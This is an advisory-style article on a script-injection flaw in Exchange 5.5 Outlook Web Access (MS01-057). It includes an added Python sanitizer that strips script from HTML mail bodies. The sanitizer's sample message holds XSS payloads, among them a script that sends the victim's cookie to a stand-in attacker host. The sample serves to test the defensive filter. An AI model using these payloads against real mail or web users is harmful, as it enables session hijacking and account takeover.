A vulnerability exists in the Microsoft Exchange Server 5.5 Outlook Web Access (OWA) service that lets an attacker take any action on a user's mailbox that the user can take, including deleting, moving and sending messages. The problem lies in the way OWA handles inline script in HTML messages when it is used with Internet Explorer (IE). Before the patch, OWA did not filter scripts embedded in a message body; it passed the message to IE as-is, so script that an attacker places in a message runs in the recipient's browser, inside the recipient's OWA session, when the recipient opens the message, and can therefore act on the mailbox with the user's rights. The patch corrects this by stripping the scripts from the message before sending it to IE.

This vulnerability only affects OWA used with IE; such scripts will not run in the Outlook client or in Outlook Express. According to Microsoft, non-IE browsers are also not affected.
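The fix described above is a server-side filter: the message body is cleaned before the browser ever sees it. Removing only `<script>` blocks is not enough for that, because IE also executes script from event-handler attributes (`onmouseover=`, `onerror=`) and from `javascript:` URLs. The following is an added example of what such a filter has to cover, written for this page; it is not code from the OWA hotfix, from Microsoft, or from the original article, and the tag allow-list, the helper names and the sample message are all constructed here for illustration.

```python
"""Allow-list sanitizer for HTML mail bodies, meant to run server-side before
the body is sent to the browser.  Constructed example: the tag/attribute lists,
helper names and the sample message are not from the OWA hotfix or Microsoft."""
from html import escape
from html.parser import HTMLParser

# Anything not on these lists is dropped.  Note there is no "script", no "on*"
# attribute and no "style": deny-by-default is what makes the filter hold up.
SAFE_TAGS = {"p", "br", "b", "i", "u", "a", "ul", "ol", "li", "div", "span", "font"}
SAFE_ATTRS = {"href", "title", "color", "size", "face"}
SAFE_SCHEMES = ("http:", "https:", "mailto:")
# Elements whose *content* is active or loads external code: skip everything up
# to the matching end tag, not just the tag itself.
SKIP_CONTENT = {"script", "style", "object", "embed", "iframe", "applet"}


class MailHtmlSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.skipping = 0      # > 0 while inside a SKIP_CONTENT element
        self.dropped = []      # audit trail: tags/attributes that were removed

    @staticmethod
    def _safe_href(value):
        # Browsers ignore control characters and whitespace inside the scheme,
        # so "java\tscript:" must be normalised before the prefix check.
        v = "".join(c for c in (value or "").lower()
                    if c.isprintable() and not c.isspace())
        return v.startswith(SAFE_SCHEMES)

    def handle_starttag(self, tag, attrs):
        if tag in SKIP_CONTENT:
            self.skipping += 1
            self.dropped.append(tag)
            return
        if self.skipping or tag not in SAFE_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name not in SAFE_ATTRS or (name == "href" and not self._safe_href(value)):
                self.dropped.append(f"{tag}@{name}")   # onmouseover=, javascript: ...
                continue
            val = escape(value or "", quote=True)
            kept.append(f' {name}="{val}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)        # "<br/>": emit once, no end tag
        if tag in SKIP_CONTENT:
            self.skipping -= 1                  # self-closed, so no end tag follows

    def handle_endtag(self, tag):
        if tag in SKIP_CONTENT:
            self.skipping = max(self.skipping - 1, 0)
        elif not self.skipping and tag in SAFE_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data, quote=False))

    def handle_entityref(self, name):
        if not self.skipping:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self.skipping:
            self.out.append(f"&#{name};")

    # Comments, <!DOCTYPE>, <?...?> and <![CDATA[ carry nothing a mail reader
    # needs, and IE conditional comments can hide script: drop them all.
    def handle_comment(self, data): pass
    def handle_decl(self, decl): pass
    def handle_pi(self, data): pass
    def unknown_decl(self, data): pass


def sanitize_report(body):
    """Return (clean_html, dropped_items) for one message body."""
    p = MailHtmlSanitizer()
    p.feed(body)
    p.close()
    return "".join(p.out), p.dropped


def sanitize(body):
    return sanitize_report(body)[0]


# Constructed sample: one benign link plus four ways of smuggling script into a
# message that a "<script>-tag only" stripper would miss in part.
SAMPLE_MESSAGE = (
    '<p>Hi, see the <a href="http://example.com/report">report</a>.</p>'
    '<script>document.location="http://attacker.example/?"+document.cookie</script>'
    '<b onmouseover="alert(document.cookie)">hover me</b>'
    '<a href="javascript:alert(1)">click</a>'
    '<img src="x" onerror="alert(1)">'
    '<!--[if IE]><script>alert(2)</script><![endif]-->'
)

if __name__ == "__main__":
    clean, dropped = sanitize_report(SAMPLE_MESSAGE)
    print(clean)
    print("dropped:", dropped)
```

The `dropped` list is worth logging in a real deployment: a burst of `b@onmouseover` or `a@href` removals from one sender is a cheap detection signal for someone probing the filter. Relative and `data:` URLs are rejected along with `javascript:`; in a mail context that costs little and avoids having to reason about every scheme the browser understands.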
Lex Arquette of WhiteHat Security is credited with reporting this issue to Microsoft.

For more details, see Microsoft Security Bulletin MS01-057.

For patches, see Exchange 5.5 Web Client Hotfix 2655.77.
Did you find this article useful? Do you want to see more of this kind, or something else? I would really appreciate your comments; feel free to email me!